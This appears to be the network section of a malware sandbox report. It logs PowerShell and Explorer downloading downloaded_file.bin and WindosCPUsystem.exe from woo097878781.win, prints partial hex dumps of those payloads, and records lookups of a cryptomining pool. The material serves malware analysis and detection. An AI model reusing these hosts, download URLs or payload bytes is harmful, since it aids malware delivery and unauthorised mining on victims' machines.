                                                                                                          Dec 9, 2024 07:39:00.055717945 CET3333498165.188.137.200192.168.2.4
                                                                                                          Dec 9, 2024 07:39:00.100413084 CET498163333192.168.2.45.188.137.200
                                                                                                          Dec 9, 2024 07:39:00.324997902 CET520049892185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:39:00.366050005 CET498925200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:39:00.721982956 CET520049848185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:39:00.772281885 CET498485200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:39:01.722603083 CET520049848185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:39:01.772345066 CET498485200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:39:02.727112055 CET520049848185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:39:02.772320032 CET498485200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:39:03.737292051 CET520049848185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:39:03.787914038 CET498485200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:39:04.752666950 CET520049848185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:39:04.794523001 CET498485200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:39:05.757199049 CET520049848185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:39:05.804740906 CET498485200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:39:06.770603895 CET520049848185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:39:06.811249971 CET498485200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:39:07.783307076 CET520049848185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:39:07.837609053 CET498485200192.168.2.4185.157.162.216

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Dec 9, 2024 07:37:02.468461037 CET6445753192.168.2.41.1.1.1
                                                                                                          Dec 9, 2024 07:37:03.250855923 CET53644571.1.1.1192.168.2.4
                                                                                                          Dec 9, 2024 07:37:36.142909050 CET5489253192.168.2.41.1.1.1
                                                                                                          Dec 9, 2024 07:37:36.610291958 CET53548921.1.1.1192.168.2.4

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Dec 9, 2024 07:37:02.468461037 CET192.168.2.41.1.1.10x26d9Standard query (0)woo097878781.winA (IP address)IN (0x0001)false
                                                                                                          Dec 9, 2024 07:37:36.142909050 CET192.168.2.41.1.1.10xc27bStandard query (0)pool.hashvault.proA (IP address)IN (0x0001)false

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Dec 9, 2024 07:37:03.250855923 CET1.1.1.1192.168.2.40x26d9No error (0)woo097878781.win154.216.20.243A (IP address)IN (0x0001)false
                                                                                                          Dec 9, 2024 07:37:36.610291958 CET1.1.1.1192.168.2.40xc27bNo error (0)pool.hashvault.pro37.203.243.102A (IP address)IN (0x0001)false
                                                                                                          Dec 9, 2024 07:37:36.610291958 CET1.1.1.1192.168.2.40xc27bNo error (0)pool.hashvault.pro5.188.137.200A (IP address)IN (0x0001)false

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • woo097878781.win

                                                                                                          HTTPS Connections

                                                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                          Dec 9, 2024 07:38:29.876619101 CET154.216.20.243443192.168.2.449764CN=woo097878781.win CN=R11, O=Let's Encrypt, C=USCN=R11, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USMon Nov 18 12:48:40 CET 2024 Wed Mar 13 01:00:00 CET 2024Sun Feb 16 12:48:39 CET 2025 Sat Mar 13 00:59:59 CET 2027771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0a0e9f5d64349fb13191bc781f81f42e1
                                                                                                          CN=R11, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USWed Mar 13 01:00:00 CET 2024Sat Mar 13 00:59:59 CET 2027

                                                                                                          HTTPS Proxied Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.449730154.216.20.2434437216C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-09 06:37:07 UTC180OUTGET /downloaded_file.bin HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                          Host: woo097878781.win
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-09 06:37:08 UTC270INHTTP/1.1 200 OK
                                                                                                          Server: nginx
                                                                                                          Date: Mon, 09 Dec 2024 06:37:08 GMT
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Length: 515600
                                                                                                          Last-Modified: Tue, 03 Dec 2024 18:46:46 GMT
                                                                                                          Connection: close
                                                                                                          ETag: "674f5216-7de10"
                                                                                                          X-Powered-By: PleskLin
                                                                                                          Accept-Ranges: bytes
                                                                                                          2024-12-09 06:37:08 UTC16114INData Raw: 2e 0c eb e5 fe 51 53 1e 6f 1d b2 28 87 2a e1 8c f3 2c 26 02 f3 81 9b 35 82 5b 91 fb dc cd 0e fa ad 82 31 59 82 ff b6 b7 81 c5 e9 eb 21 76 36 67 6b aa 7f 50 fc fa 16 fc 10 fa 5f 9e 0a b2 fc db 15 50 63 7e fa d9 56 9b 5f 51 a5 28 4e 0e 99 6a 0a a8 f8 bb 0e 69 a0 d8 72 1c 78 8b 7b 10 66 58 dd 68 79 2e 5c 71 32 83 aa fb bd 26 ee 69 f0 86 3a 29 d5 65 fa 90 2b 96 da 7b c1 67 3b b2 fd 14 3f 8f 4b 92 e9 7c 36 83 dd 20 f8 35 15 1a c0 00 f5 e3 d1 d8 93 f5 49 c8 52 47 c8 9f 5b b7 9f 36 c7 de 76 82 00 9e 3a d9 45 db 98 eb 29 3f af ae 91 fd 98 0c 4d 89 b9 60 f0 a0 a0 77 ff a8 fc b4 7a e1 9a 5b 66 88 43 e1 20 01 12 3f d5 d5 ac 6f 1f 2c 95 0a 1b fb 78 96 cf 6b b4 18 4f dd 31 b8 ac 36 cd ca 89 ea 8b 41 b6 a7 b1 de 12 dd 67 6d 84 c5 40 e2 fa d3 49 09 89 26 16 e1 06 27 ca
                                                                                                          Data Ascii: .QSo(*,&5[1Y!v6gkP_Pc~V_Q(Njirx{fXhy.\q2&i:)e+{g;?K|6 5IRG[6v:E)?M`wz[fC ?o,xkO16Agm@I&'
                                                                                                          2024-12-09 06:37:08 UTC16384INData Raw: 8c 15 2f 34 a5 d7 35 3e bf 3c d8 89 78 cb 90 b2 e5 c4 92 d7 2d 5f f3 8a 36 64 02 ad 9e 1c a5 1a 80 94 05 5b 1a ee 74 67 74 40 3b 0a 1f 87 3c 3f f2 2a 83 c9 41 0a 9d 10 ab 5a a2 5d 87 10 49 1a e9 34 75 12 7a 2e dd 8b 1a 68 d3 71 ec 36 41 a5 0a 23 c9 41 83 fb 6e 40 e6 f9 a1 d1 30 51 8a 9c 75 5c d4 26 ed 71 ec 62 0c 70 55 35 0b 2d 99 be cc 8a 2a ea 32 99 3c 32 36 9a f8 a8 58 96 8e 39 d1 90 61 58 22 4e 35 2a 9d 47 cf 1c a1 fe 1e fb b4 7f a7 ad 2f 73 dc 4f 4c 7a 42 14 34 97 ea 6c 50 d8 1c ad 91 8e 8b 49 e4 70 13 1d c6 67 d0 cd d7 a9 98 d6 46 6f f0 da db 18 45 36 cf d3 2f 08 de d5 23 e2 4b 14 fb f4 85 aa e2 bc ef 67 76 47 c7 6f 8e 0b dd 73 5d f1 f6 79 cf e0 cd e4 76 d8 40 4e a0 41 f9 0d b9 2b a8 6c ea 6e 38 d7 6f 85 1c e7 7f bf 9f 35 66 a3 79 ac b4 1b 51 2a 11
                                                                                                          Data Ascii: /45><x-_6d[tgt@;<?*AZ]I4uz.hq6A#An@0Qu\&qbpU5-*2<26X9aX"N5*G/sOLzB4lPIpgFoE6/#KgvGos]yv@NA+ln8o5fyQ*
                                                                                                          2024-12-09 06:37:08 UTC16384INData Raw: 77 44 cc 55 d1 3d 87 bf 1a cd a3 dc 09 1e 03 48 d2 63 e4 fd 16 02 8b 35 46 16 d1 71 0a fb 48 45 d7 65 0c e4 3f 16 71 5a a7 8f 4a 34 9d db ac 23 24 b4 f1 f4 fe ce ff f4 8d bf bd 13 73 d7 6f e0 aa d8 49 af ed 20 5b f0 7a 6f 13 72 90 03 52 f8 fb a8 87 6d 01 ab b0 af 0a 29 ca a2 72 8e 8a c4 5a 08 80 6a 72 81 6d 24 35 60 5b 2f 63 42 ba f7 a1 d9 c4 f6 31 be 08 13 c0 3c 47 05 ca 1f 7c 28 38 0d c9 57 4e 4e 73 cb d0 d3 e4 94 9d 70 08 e1 6d 44 20 4b bf 81 f2 95 b8 c4 83 f1 ad c6 0b 96 0b 32 2e ce 8c 47 a2 ff 64 57 7c 24 3a ad a4 ca 7e 82 cb 2c 70 2e ad 80 09 24 2d 34 bd 7e 6a 88 2b fa d3 c4 bc ca 90 e7 87 5e 97 94 d9 1f c2 20 b8 35 b5 91 03 3c cf 86 35 3e b4 f2 b1 c9 10 c8 9c f6 f8 14 bb 71 48 a5 36 00 5c db 5e 9c 24 80 c7 33 0d 82 34 d2 b1 fb b0 14 84 3f 7d a4 9b
                                                                                                          Data Ascii: wDU=Hc5FqHEe?qZJ4#$soI [zorRm)rZjrm$5`[/cB1<G|(8WNNspmD K2.GdW|$:~,p.$-4~j+^ 5<5>qH6\^$34?}
                                                                                                          2024-12-09 06:37:08 UTC16384INData Raw: fb a5 8f 4e 3d 74 95 bc e4 1b 3d b0 55 a6 7f 3b 9a 97 80 1e be 13 2d d4 2c ac 4e 8b 21 c0 bc 74 5d 2a b9 00 b8 f7 8d 58 5d 7c b4 2c 5e 44 ec 39 7c 75 60 38 8a b0 d2 91 de f2 43 c7 bf 94 49 14 31 d3 2e cc 2c 16 86 ab c0 56 f1 21 ec 31 9a 2e 73 ba af 17 24 f7 cc 8d 68 14 78 49 d8 0a df 8e 5d 56 bf 86 10 78 66 fb a9 74 72 62 ff fb f2 cc dc 43 c0 66 d9 d2 69 9d 33 8d 18 23 00 b6 7e d2 0a 16 82 72 2a 3a 9b 9e 49 d4 70 7e 7f 2a 73 a5 09 0b 72 89 bc b5 c1 70 e2 71 ca 9c a0 6a 8b ea be 6b 16 83 c7 34 e5 39 3c 05 c3 44 93 39 fd b7 8f 20 dc 20 75 d7 f3 04 e3 39 64 ae ea 46 f7 86 ee 26 26 d4 cb 65 67 8d eb 55 30 0d a9 f5 b2 82 35 05 d4 18 13 94 d2 9a 15 fb 3f 4c 97 96 a8 ba 24 6a 28 c9 5b ed e3 33 9e c7 67 d0 7a a8 36 c2 37 29 68 4d 39 b3 a2 02 71 62 11 74 26 37 fa
                                                                                                          Data Ascii: N=t=U;-,N!t]*X]|,^D9|u`8CI1.,V!1.s$hxI]VxftrbCfi3#~r*:Ip~*srpqjk49<D9 u9dF&&egU05?L$j([3gz67)hM9qbt&7
                                                                                                          2024-12-09 06:37:08 UTC16384INData Raw: 9f e1 12 13 7a 42 b8 4c 70 71 f8 28 76 2f 9b ce e2 b0 71 ea c6 c4 0f 88 2d 12 1f a4 c9 6f 11 fa 35 f2 b5 ab 01 2e 70 2a eb b6 d0 94 3d 11 fb ca 58 3f e5 bf b6 8d ab 75 0e 5a 41 29 9a 63 5d 9e 20 64 0b 3b 3a ea eb 56 ef 21 eb ab a2 11 ba a6 ad e1 9e a3 2a c4 cd 15 d0 29 c1 1a db b7 1e 17 ef 4d ea e3 d1 9b e7 00 19 2a e8 77 6b 85 0d 16 e8 f7 d6 a8 e6 e7 bc c3 49 b9 b1 e0 80 5b 82 c5 7c ed 65 cb 19 82 52 b8 ee 21 ed 20 c2 3a 14 88 84 6a ef 9c 8d a0 c3 8f a8 dd 08 f3 2a 58 19 fe 0b a2 f3 a9 89 d2 a0 ba 20 b4 5f 0c 86 a4 44 f2 17 2c ba 36 e0 8f ff 49 35 99 d0 a1 49 3e 55 0e 25 80 23 af 61 4c 29 6a ae 72 d2 c6 ca 18 85 4c b6 b5 0c 56 e5 82 e4 06 b8 be 42 8b ff 68 62 1e b2 b0 81 fe c9 e7 b3 25 17 6d 86 2e c8 8a fb 10 26 e6 d6 77 7f 5e 2c fe f4 99 a8 e3 f1 c9 aa
                                                                                                          Data Ascii: zBLpq(v/q-o5.p*=X?uZA)c] d;:V!*)M*wkI[|eR! :j*X _D,6I5I>U%#aL)jrLVBhb%m.&w^,
                                                                                                          2024-12-09 06:37:08 UTC16384INData Raw: 86 90 1d 44 42 9e 9e b7 df c0 fc 4b 24 3b 49 c6 df f6 f3 3f de 4f f1 ad 49 e5 94 78 10 b5 28 78 f7 31 1f 26 42 f9 d6 49 0f 1f 08 d7 88 01 f8 4f 9d 88 f1 6e 41 c4 fe d2 40 9a 78 c3 21 3f e6 54 93 4f a0 10 cd a7 14 c4 58 22 7e 82 ef 66 2e d0 a9 62 62 45 aa 8a 7c c3 10 95 9f 4d ff 39 9d 09 ba 78 f4 76 64 e1 f7 82 c2 94 15 57 a9 87 a6 9a b2 6a 63 c9 33 e5 2e a2 98 e8 96 69 ee 0d 8a 69 0c cb 59 f3 10 69 af 9d 69 27 1a 8b 0d 9e b0 e9 3b c9 96 38 12 34 fc 59 59 bb 29 90 b4 6c a8 8d ac 42 57 d8 c7 b2 d3 e5 bc 7a c9 e8 a6 38 9e 3f de ab e6 6a a2 2e 8d 53 f4 b7 52 e1 7b 5d 8c b0 a6 c0 fd 0a 22 c9 4a 23 77 15 8f ee ce e2 bc 86 25 5c 60 3e 35 3a f0 7e 57 0f ef d7 04 df 32 8c 86 2b 15 a3 58 7e e1 88 b9 ea fb 41 9c 7b 4c 25 6a 7e 7b e0 49 0a 37 c3 87 f0 f6 39 2d a5 14
                                                                                                          Data Ascii: DBK$;I?OIx(x1&BIOnA@x!?TOX"~f.bbE|M9xvdWjc3.iiYii';84YY)lBWz8?j.SR{]"J#w%\`>5:~W2+X~A{L%j~{I79-
                                                                                                          2024-12-09 06:37:08 UTC16384INData Raw: 1b 71 e4 65 12 a3 0e 09 a9 9e ce 01 8d 50 66 7b b8 49 00 44 81 6b 18 ac 44 ac fb 81 a6 1e d2 90 95 f6 2b f1 f1 aa b8 dd d5 34 76 3a 16 7e 70 d4 f1 79 be 22 50 b5 3a f3 5f 48 e9 af 0d 4f 5f 78 71 00 a3 5f 42 f8 67 24 85 1d b3 fa ed 45 49 75 1a cf ec 38 3f 14 28 21 20 eb 36 3d 7a dc f7 92 30 73 f3 02 4c 91 75 8b 29 d1 a7 9c 5a 46 15 3d e1 35 1b e6 ee 5b 91 c0 c0 06 a0 24 58 a2 7b df 0d a7 2c 1c 4e 5a f0 49 b2 44 24 25 76 3b 9b 19 5d d2 ec 9c 9d 39 56 75 55 78 0f ee fa 2a 36 57 af a1 57 d9 72 61 a6 96 1c 71 84 fb 7f ca d1 37 6e f6 13 91 cd 2c 21 be 56 d9 38 6e 31 c6 29 c4 cc f2 69 0e 7d 20 df 37 5b 7d ae ac 23 3c 23 96 58 77 5c 97 11 b3 2d c3 dc c4 a4 21 7e a9 be 92 44 3a eb 6c fe 77 9f 82 8e f3 0c b5 81 65 4e df 4e e8 32 a1 5a e8 b6 7c da ac fb 0c ce a8 10
                                                                                                          Data Ascii: qePf{IDkD+4v:~py"P:_HO_xq_Bg$EIu8?(! 6=z0sLu)ZF=5[$X{,NZID$%v;]9VuUx*6WWraq7n,!V8n1)i} 7[}#<#Xw\-!~D:lweNN2Z|
                                                                                                          2024-12-09 06:37:09 UTC16384INData Raw: 63 56 1d ab 8d 68 f7 05 e7 4b 47 30 4c 8d 81 e5 3f 2c 84 53 f8 ea 71 36 b9 d8 1e 42 14 cb 56 5f f8 52 0c 5c 6b 27 7e 12 ba 8b ec 8c 50 d6 2b dc 8f 5d 10 b4 cb af 7d 0f bf 7b 0d 7d c9 58 db f4 06 fc 09 f6 d9 c4 e1 9a db 62 42 ce 27 14 05 4c 70 93 e2 d1 27 b4 0f 3c 6b 96 c7 bb 4a 7d 40 bf 18 95 46 87 c4 f6 7b da af dc 7d 39 e8 48 5a 4d 3a c2 df 55 66 04 cd 00 82 8a 2f fc d5 e2 e5 08 85 90 3f b6 7b 74 97 e8 94 85 dd 90 c4 3e 9d 1a 4f 11 13 06 21 56 ea 31 7c 4c cf 01 da 47 00 ff a1 2e 78 41 3d 9f b6 69 32 75 50 42 9f 2a 76 3c 71 dd 55 0c fc c2 46 ab bc 34 3b c9 c9 40 0e 15 c1 60 f0 66 44 2e ef 6e 75 99 b8 0a e3 74 b5 09 1b 5b 26 cb 37 b5 f1 63 bb 47 3f cb 80 46 95 be ac 8a 54 7d 9f 1e e2 73 f7 6e 2d 24 88 09 e2 36 d5 5d 58 47 f9 97 28 a1 82 23 8a ec 8c 1d af
                                                                                                          Data Ascii: cVhKG0L?,Sq6BV_R\k'~P+]}{}XbB'Lp'<kJ}@F{}9HZM:Uf/?{t>O!V1|LG.xA=i2uPB*v<qUF4;@`fD.nut[&7cG?FT}sn-$6]XG(#
                                                                                                          2024-12-09 06:37:09 UTC16384INData Raw: 20 7b 1d 64 91 3a dd ec 6c 9d cd 6f 3c 7b f3 05 64 9f 3a e9 13 ef af 5b 6b fb 73 4a 45 08 ce 8b 26 b5 c8 55 18 87 30 51 d0 e8 bb 80 a3 46 95 90 ab 7e 7c 82 a9 b8 4b 49 05 4c 2f f9 a6 44 f8 05 9f c2 0a fb d7 77 9d 12 a1 89 9a 3d 29 5f a8 1c 2b 9e 19 1f d1 01 c9 32 93 b3 4e 7a 21 1a e7 5c ed 35 cc e1 bf 22 50 da 19 9f 10 15 e5 1d 69 f8 77 06 45 b8 fd 62 26 77 22 1e 4d 96 bf 5f 5f 81 c0 50 3d 36 7b bc 78 ba a3 50 e5 51 15 b6 1a c2 0a fe a7 ac 26 19 b4 60 f6 9d 76 50 6b 70 5c eb 7f 68 73 c9 f3 2c 8b 86 51 2d 02 32 a8 3c 25 bb af cb 69 23 87 11 26 6a 5d ca 3a ae 0d 39 48 4d 8f 14 cb 9c 47 70 dc 7a bb 50 55 27 ce f2 a4 99 56 0f 29 d0 d5 ec e2 f9 88 12 e3 3b 24 69 b8 53 a2 d8 17 f6 dc 9b 2d 1a 25 84 a7 e5 0d 8c 05 02 1f 93 36 69 30 08 5f 7b 68 f9 1e 45 a4 74 7a
                                                                                                          Data Ascii: {d:lo<{d:[ksJE&U0QF~|KIL/Dw=)_+2Nz!\5"PiwEb&w"M__P=6{xPQ&`vPkp\hs,Q-2<%i#&j]:9HMGpzPU'V);$iS-%6i0_{hEtz
                                                                                                          2024-12-09 06:37:09 UTC16384INData Raw: 87 ed a9 a0 74 4b 83 c6 4c dd b7 95 c3 6b 7d ef e3 b5 45 c5 80 b8 d8 ce 6d 35 c2 84 fe b0 18 d0 45 85 d6 1b 42 ca 77 70 6b 28 6f 60 9f e9 90 6d 8a 12 6c 45 7b 29 92 41 a6 d0 ce 6d 06 3e bf 18 14 3e 4c 59 fb c7 1a cc 07 74 48 e1 76 62 5e 94 9a 43 f2 d5 d3 f9 42 4b d9 ab 59 e6 15 fd 39 03 0b 24 39 a1 bd a3 2f 22 ea 73 e9 7e 88 75 6a f2 68 05 6c 46 b8 58 de 2e b2 9a 37 8f 69 f7 f4 85 3e fc 3f 76 2d a4 69 0f d0 14 68 e7 03 4f ec 0f 59 9b 8d 23 b7 b6 41 11 ce 89 7f 68 20 c0 56 c1 42 a8 82 dd d7 dc 6f 30 bf 33 a7 04 5d 92 ac 1d ad a0 c2 7f 22 43 5b e2 4d 75 ba 37 3f ee 50 9a 37 11 c5 b1 41 b4 22 5c 9d bd 50 8c 88 18 49 63 07 0c f5 d1 0d 4a 37 ac eb 81 22 12 5b ad c2 62 20 dc 7c e9 b4 c6 48 b4 12 aa db e7 78 e7 18 e5 ae b2 8c 0b fd 65 81 d6 1f 8a b1 e8 fa 98 df
                                                                                                          Data Ascii: tKLk}Em5EBwpk(o`mlE{)Am>>LYtHvb^CBKY9$9/"s~ujhlFX.7i>?v-ihOY#Ah VBo03]"C[Mu7?P7A"\PIcJ7"[b |Hxe


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.449738154.216.20.2434437784C:\Windows\explorer.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-09 06:37:30 UTC223OUTGET /WindosCPUsystem.exe HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Accept: */*
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                                                          Host: woo097878781.win
                                                                                                          2024-12-09 06:37:30 UTC275INHTTP/1.1 200 OK
                                                                                                          Server: nginx
                                                                                                          Date: Mon, 09 Dec 2024 06:37:30 GMT
                                                                                                          Content-Type: application/x-msdos-program
                                                                                                          Content-Length: 2887168
                                                                                                          Last-Modified: Mon, 09 Dec 2024 06:24:51 GMT
                                                                                                          Connection: close
                                                                                                          ETag: "67568d33-2c0e00"
                                                                                                          X-Powered-By: PleskLin
                                                                                                          Accept-Ranges: bytes
                                                                                                          2024-12-09 06:37:30 UTC16109INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0a 00 99 8c 56 67 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 60 03 00 00 0a 2c 00 00 04 00 00 d0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 80 2c 00 00 04 00 00 5f 8f 2c 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdVg.&`,@,_,`
                                                                                                          2024-12-09 06:37:30 UTC16384INData Raw: 74 2d 48 8d 05 52 1e 2b 00 41 b8 04 00 00 00 48 89 f1 41 89 d6 48 89 c2 ff 53 18 44 89 f2 84 c0 74 0d b0 01 48 83 c4 20 5b 5f 5e 41 5e 5d c3 83 fa 0a 0f 94 07 48 8b 43 20 48 89 f1 48 83 c4 20 5b 5f 5e 41 5e 5d 48 ff e0 66 2e 0f 1f 84 00 00 00 00 00 55 48 89 e5 49 89 d0 48 8d 15 ca 1d 2b 00 5d e9 dc f2 ff ff 66 66 66 2e 0f 1f 84 00 00 00 00 00 55 48 81 ec 90 00 00 00 48 8d ac 24 80 00 00 00 48 8b 45 40 48 89 4d 00 48 89 55 08 4c 89 45 f0 4c 89 4d f8 48 89 e9 48 89 4d d0 48 8d 0d 3e f2 ff ff 48 89 4d d8 48 8d 4d f0 48 89 4d e0 48 8d 0d 4b f2 ff ff 48 89 4d e8 48 8d 0d 00 76 2b 00 48 89 4d a0 48 c7 45 a8 02 00 00 00 48 c7 45 c0 00 00 00 00 48 8d 4d d0 48 89 4d b0 48 c7 45 b8 02 00 00 00 48 8d 4d a0 90 50 5a e8 40 e3 ff ff cc 66 66 66 66 66 66 2e 0f 1f 84 00
                                                                                                          Data Ascii: t-HR+AHAHSDtH [_^A^]HC HH [_^A^]Hf.UHIH+]fff.UHH$HE@HMHULELMHHMH>HMHMHMHKHMHv+HMHEHEHMHMHEHMPZ@ffffff.
                                                                                                          2024-12-09 06:37:30 UTC16384INData Raw: 41 80 c2 04 45 89 d1 44 0f b6 5a 05 45 8d 53 bf 41 80 fa 1a 72 25 45 8d 53 9f 41 80 fa 1a 73 06 41 80 c3 b9 eb 12 45 8d 53 d0 41 80 fa 0a 0f 83 f7 00 00 00 41 80 c3 04 45 89 da 0f b6 72 06 44 8d 5e bf 41 80 fb 1a 72 25 44 8d 5e 9f 41 80 fb 1a 73 06 40 80 c6 b9 eb 12 44 8d 5e d0 41 80 fb 0a 0f 83 d8 00 00 00 40 80 c6 04 41 89 f3 0f b6 72 07 8d 56 bf 80 fa 1a 72 20 8d 56 9f 80 fa 1a 73 06 40 80 c6 b9 eb 10 8d 56 d0 80 fa 0a 0f 83 bd 00 00 00 40 80 c6 04 89 f2 0f b6 c0 45 0f b6 c0 c1 e0 0c 41 c1 e0 06 49 01 c0 41 0f b6 c1 4c 01 c0 45 0f b6 c2 48 c1 e0 0c 41 c1 e0 06 45 0f b6 cb 4d 01 c1 49 01 c1 49 c1 e1 06 0f b6 c2 4c 01 c8 90 50 5a 48 c1 ea 20 74 14 48 8d 05 29 13 2b 00 48 89 01 48 c7 41 08 28 00 00 00 eb 11 c7 41 08 01 00 00 00 89 41 0c 48 c7 01 00 00 00
                                                                                                          Data Ascii: AEDZESAr%ESAsAESAAErD^Ar%D^As@D^A@ArVr Vs@V@EAIALEHAEMIILPZH tH)+HHA(AAH
                                                                                                          2024-12-09 06:37:30 UTC16384INData Raw: 01 c2 4c 89 55 e0 4f 8d 14 18 4c 89 55 00 4d 89 c2 4d 29 ea 49 ff c2 4c 89 55 d8 4e 8d 24 06 49 89 cf 4d 89 c2 48 89 7d f8 eb 7d 80 7a 1a 00 74 0c 48 c7 01 02 00 00 00 e9 db 02 00 00 44 0f b6 52 18 44 89 d0 34 01 88 42 18 4c 8b 42 08 48 8b 42 48 4c 8b 4a 50 4d 85 c0 0f 84 b6 01 00 00 4d 39 c8 0f 83 a7 01 00 00 42 80 3c 00 bf 0f 8f a2 01 00 00 48 8d 0d 29 e7 2a 00 48 89 4c 24 20 48 89 c1 4c 89 ca e8 19 86 ff ff 45 31 c9 48 8b 7d f8 4c 89 4a 38 4d 89 cf 4c 8b 4d d0 4d 01 d1 49 39 c1 0f 83 81 02 00 00 4d 39 d0 0f 85 ee 00 00 00 46 0f b6 0c 0e 4c 0f a3 cf 73 57 4d 39 fd 4d 89 f9 4d 0f 47 cd 48 83 f9 ff 4d 0f 44 cd 4c 89 cf 66 90 4c 39 df 73 59 49 89 fa 4c 01 c7 48 39 c7 0f 83 5f 02 00 00 49 8d 7a 01 43 0f b6 1c 16 43 3a 1c 14 74 dd 4c 03 55 d8 4c 89 52 28 48
                                                                                                          Data Ascii: LUOLUMM)ILUN$IMH}}ztHDRD4BLBHBHLJPMM9B<H)*HL$ HLE1H}LJ8MLMMI9M9FLsWM9MMGHMDLfL9sYILH9_IzCC:tLULR(H
                                                                                                          2024-12-09 06:37:30 UTC16384INData Raw: ff f6 45 20 01 74 52 4c 8b 45 28 4d 85 c0 0f 84 c0 00 00 00 4d 39 f0 0f 87 7f 01 00 00 48 8d 4d f0 53 5a 90 e8 4a 39 ff ff 83 7d f0 01 0f 84 7e 01 00 00 48 8b 55 f8 4c 8b 45 00 eb 24 c6 47 04 00 48 8d 15 db b9 2a 00 e9 a7 fe ff ff 89 c1 e8 3b 4a 02 00 e9 7a fe ff ff 48 8b 55 28 4c 8b 45 30 56 90 59 e8 da 01 00 00 e9 86 fe ff ff 44 0f b6 c0 3c 05 0f 83 0b 01 00 00 48 8d 4d 20 48 89 fa e8 ed 38 ff ff c6 47 04 00 f6 45 20 01 75 62 48 8b 55 28 48 8b 45 30 48 89 45 d0 48 39 d8 0f 85 3c 01 00 00 56 59 90 49 89 d8 e8 93 01 00 00 48 09 c0 0f 85 3b fe ff ff 48 89 55 40 48 89 5d e0 48 39 d3 0f 85 37 01 00 00 ba 01 00 00 00 e9 20 fe ff ff 0f b6 03 48 8d 0d f1 b7 2a 00 0f b6 0c 08 4c 39 f1 76 0b 88 07 c6 47 04 01 e9 77 fe ff ff b8 01 00 00 00 48 8d 15 25 b9 2a 00 e9
                                                                                                          Data Ascii: E tRLE(MM9HMSZJ9}~HULE$GH*;JzHU(LE0VYD<HM H8GE ubHU(HE0HEH9<VYIH;HU@H]H97 H*L9vGwH%*
